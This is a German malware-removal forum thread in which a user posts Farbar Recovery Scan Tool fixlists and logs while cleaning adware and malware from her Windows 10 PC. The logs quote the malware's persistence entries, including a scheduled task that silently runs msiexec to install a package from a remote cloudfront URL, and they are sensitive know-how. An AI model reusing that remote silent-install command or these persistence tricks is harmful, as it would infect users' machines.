2017-02-12 22:14 - 2017-02-13 20:05 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Local\Reabation
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ___HD C:\ProgramData\108l42A89c7603
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\WR5TG73LV7
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\P3ZUK80JKY
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\IQ50062YNB
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files (x86)\BeCleaner
2017-02-12 22:13 - 2017-02-13 20:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Zrshfcit
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Qolther
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Ghuversp
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Thteckganoied
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Plidaing
2017-02-12 21:59 - 2017-02-12 22:08 - 70965739 _____ (eRightSoft ) C:\Users\Barbara\Downloads\SUPERsetup.exe
2017-02-10 16:16 - 2017-02-10 16:16 - 03287737 _____ C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "x5o3Yv2CQw.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "zC6b23GTAV.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "GWH9N93A6U"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JLAWFPN14I"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "XN55R0BYZD"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "LAMMPX75X6"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JG5BHCSAVC"
FirewallRules: [{9D55ECBB-5F7C-4C93-8581-D680E589C6CE}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{ADBDAF4A-07E9-49DB-9143-E96D557CF9D2}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{CB3BDEFE-0BF5-4061-94BB-7D2369AC1E55}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{DD54EA2F-A6AF-4273-947B-D0C663DE40BC}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{869331B2-5268-469F-A83F-7D7CBAC32BA4}] => C:\Windows\System32\rundll32.exe

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

Schritt: 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Bitte poste dein Ergebnis zwischen Code-Tags
Wenn ein Log zu lange ist, teile ihn bitte auf mehrere Antworten.

Code-Tags?

Drücke einfach die # in Antwortfenster und füge den Log dazwischen ein

BaBi · 13.02.2017, 21:31

fixlog.txt

Zitat:

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 21:23:34) Run:1
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
closeprocesses:
emptytemp:

Task: {82DEE0EB-4548-49CE-881E-34A0D3C76D71} - \OneDrive Standalone Update Task v2 -> Keine Datei <==== ACHTUNG
Task: {8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} - System32\Tasks\108l42A89c7603 => Rundll32.exe "C:\ProgramData\108l42A89c7603\108l42A89c7603.dll",lAcqxFh <==== ACHTUNG
Task: {BF709A57-E750-4DDD-B582-32B6C514637F} - \{7D0D0E47-797A-7F7A-7D11-7D797E041105} -> Keine Datei <==== ACHTUNG
Task: {E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} - System32\Tasks\Pregehabering => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&v=2017212 /q
Task: {ED9678EB-B078-4A94-A29D-89D8596AB858} - System32\Tasks\Atikationbogot System => C:\Program Files (x86)\Plidaing\drerzes.exe [2017-02-12] (Glarysoft Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [ZJy9zt07Me] => C:\Program Files\PDR238V39I\22XHB7149.exe [370176 2017-02-13] ()
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [HGFI7viJwx] => C:\Program Files\XPQ0UG79CA\XPQ0UG79C.exe [370176 2017-02-13] ()
ShellExecuteHooks: Kein Name - {12BEB57E-ECD3-11E6-A98A-64006A5CFC23} - C:\Users\Barbara\AppData\Roaming\Zrshfcit\Griotain.dll -> Keine Datei
R2 Dalidom; C:\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll [154624 2017-02-12] () [Datei ist nicht signiert]
S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
S1 cvjjfjaa; \??\C:\WINDOWS\system32\drivers\cvjjfjaa.sys [X]
2017-02-13 20:19 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\XPQ0UG79CA
2017-02-13 20:13 - 2017-02-13 20:13 - 00000000 ____D C:\Program Files (x86)\pfqv62f8
2017-02-13 19:19 - 2017-02-13 19:19 - 00000000 ____D C:\Program Files\PDR238V39I
2017-02-12 22:16 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\8K5F5GX6AI
2017-02-12 22:15 - 2017-02-13 20:03 - 00000000 ____D C:\Program Files (x86)\vpF0TnTYqt
2017-02-12 22:14 - 2017-02-13 20:39 - 00000000 ____D C:\Program Files (x86)\Druciy
2017-02-12 22:14 - 2017-02-13 20:05 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Local\Reabation
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ___HD C:\ProgramData\108l42A89c7603
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\WR5TG73LV7
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\P3ZUK80JKY
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files\IQ50062YNB
2017-02-12 22:13 - 2017-02-13 20:45 - 00000000 ____D C:\Program Files (x86)\BeCleaner
2017-02-12 22:13 - 2017-02-13 20:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Zrshfcit
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Qolther
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Users\Barbara\AppData\Local\Ghuversp
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Thteckganoied
2017-02-12 22:13 - 2017-02-12 22:13 - 00000000 ____D C:\Program Files (x86)\Plidaing
2017-02-12 21:59 - 2017-02-12 22:08 - 70965739 _____ (eRightSoft ) C:\Users\Barbara\Downloads\SUPERsetup.exe
2017-02-10 16:16 - 2017-02-10 16:16 - 03287737 _____ C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rn?t ??pl?r?r.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\L?un?h Int?rn?t ??pl?r?r ?r?ws?r.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\??zill? Fir?f??.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\??zill? Fir?f??.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "x5o3Yv2CQw.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "zC6b23GTAV.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "GWH9N93A6U"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JLAWFPN14I"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "XN55R0BYZD"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "LAMMPX75X6"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JG5BHCSAVC"
FirewallRules: [{9D55ECBB-5F7C-4C93-8581-D680E589C6CE}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{ADBDAF4A-07E9-49DB-9143-E96D557CF9D2}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{CB3BDEFE-0BF5-4061-94BB-7D2369AC1E55}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{DD54EA2F-A6AF-4273-947B-D0C663DE40BC}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{869331B2-5268-469F-A83F-7D7CBAC32BA4}] => C:\Windows\System32\rundll32.exe
*****************

Prozesse erfolgreich geschlossen.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82DEE0EB-4548-49CE-881E-34A0D3C76D71} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82DEE0EB-4548-49CE-881E-34A0D3C76D71} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OneDrive Standalone Update Task v2 => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\108l42A89c7603 => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\108l42A89c7603 => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BF709A57-E750-4DDD-B582-32B6C514637F} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BF709A57-E750-4DDD-B582-32B6C514637F} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D0D0E47-797A-7F7A-7D11-7D797E041105} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Pregehabering => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pregehabering => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ED9678EB-B078-4A94-A29D-89D8596AB858} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED9678EB-B078-4A94-A29D-89D8596AB858} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Atikationbogot System => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Atikationbogot System => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ZJy9zt07Me => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Windows\CurrentVersion\Run\\HGFI7viJwx => Wert erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{12BEB57E-ECD3-11E6-A98A-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{12BEB57E-ECD3-11E6-A98A-64006A5CFC23} => Schlüssel nicht gefunden.
HKLM\System\CurrentControlSet\Services\Dalidom => Schlüssel erfolgreich entfernt
Dalidom => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\NVIDIA Wireless Controller Service => Schlüssel erfolgreich entfernt
NVIDIA Wireless Controller Service => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\cvjjfjaa => Schlüssel erfolgreich entfernt
cvjjfjaa => Dienst erfolgreich entfernt
C:\Program Files\XPQ0UG79CA => erfolgreich verschoben
C:\Program Files (x86)\pfqv62f8 => erfolgreich verschoben
C:\Program Files\PDR238V39I => erfolgreich verschoben
C:\Program Files\8K5F5GX6AI => erfolgreich verschoben
C:\Program Files (x86)\vpF0TnTYqt => erfolgreich verschoben
C:\Program Files (x86)\Druciy => erfolgreich verschoben
C:\WINDOWS\system32\SSL => erfolgreich verschoben
C:\WINDOWS\system32\sstmp => erfolgreich verschoben
C:\Users\Barbara\AppData\Local\Reabation => erfolgreich verschoben
C:\ProgramData\108l42A89c7603 => erfolgreich verschoben
C:\Program Files\WR5TG73LV7 => erfolgreich verschoben
C:\Program Files\P3ZUK80JKY => erfolgreich verschoben
C:\Program Files\IQ50062YNB => erfolgreich verschoben
C:\Program Files (x86)\BeCleaner => erfolgreich verschoben
C:\Users\Barbara\AppData\Roaming\Zrshfcit => erfolgreich verschoben
C:\Users\Barbara\AppData\Local\Qolther => erfolgreich verschoben
C:\Users\Barbara\AppData\Local\Ghuversp => erfolgreich verschoben
C:\Program Files (x86)\Thteckganoied => erfolgreich verschoben
C:\Program Files (x86)\Plidaing => erfolgreich verschoben
C:\Users\Barbara\Downloads\SUPERsetup.exe => erfolgreich verschoben
C:\WINDOWS\fb8637bc1a4671a0ade9e7275e924c95.exe => erfolgreich verschoben
C:\Users\Barbara\AppData\Local\Chromium => erfolgreich verschoben
"C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rn?t ??pl?r?r.lnk" => Konnte nicht verschoben werden.
"C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\L?un?h Int?rn?t ??pl?r?r ?r?ws?r.lnk" => Konnte nicht verschoben werden.
"C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\??zill? Fir?f??.lnk" => Konnte nicht verschoben werden.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\??zill? Fir?f??.lnk" => Konnte nicht verschoben werden.
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`27hfm" ADS erfolgreich entfernt.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\x5o3Yv2CQw.exe => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\x5o3Yv2CQw.exe => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\zC6b23GTAV.exe => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\zC6b23GTAV.exe => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\GWH9N93A6U => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\GWH9N93A6U => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\JLAWFPN14I => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\JLAWFPN14I => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\XN55R0BYZD => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\XN55R0BYZD => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\LAMMPX75X6 => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\LAMMPX75X6 => Wert nicht gefunden.
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\JG5BHCSAVC => Wert erfolgreich entfernt
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\JG5BHCSAVC => Wert nicht gefunden.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9D55ECBB-5F7C-4C93-8581-D680E589C6CE} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ADBDAF4A-07E9-49DB-9143-E96D557CF9D2} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CB3BDEFE-0BF5-4061-94BB-7D2369AC1E55} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{DD54EA2F-A6AF-4273-947B-D0C663DE40BC} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{869331B2-5268-469F-A83F-7D7CBAC32BA4} => Wert erfolgreich entfernt

=========== EmptyTemp: ==========

BITS transfer queue => 87700 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 134994138 B
Java, Flash, Steam htmlcache => 35939513 B
Windows/system/drivers => 36165550 B
Edge => 142283538 B
Chrome => 0 B
Firefox => 380331303 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 3266 B
NetworkService => 572350 B
Barbara => 159714181 B

RecycleBin => 343679103 B
EmptyTemp: => 1.1 GB temporäre Dateien entfernt.

================================

Das System musste neu gestartet werden.

==== Ende von Fixlog 21:24:22 ====

frst

FRST Logfile:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
durchgeführt von Barbara (Administrator) auf BARBARA-PC (13-02-2017 21:28:38)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Platform: Windows 10 Pro Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Apple Computer, Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\HxTsr.exe
() C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-23] (Microsoft Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify Web Helper] => C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify] => C:\Users\Barbara\AppData\Roaming\Spotify\Spotify.exe [7153264 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Steam] => c:\Program Files (x86)\Steam\steam.exe [2851408 2016-07-09] (Valve Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{92a07177-073c-4d90-93ea-d374613fc39e}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-30] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 8rnx3iua.default
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default [2017-02-13]
FF Extension: (2020 3D Viewer for IKEA) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\2020Player_IKEA@2020Technologies.com [2016-12-16]
FF Extension: (Firefox Hotfix) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-01]
FF Extension: (Ghostery) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox@ghostery.com.xpi [2017-02-12]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-30] (Oracle Corporation)
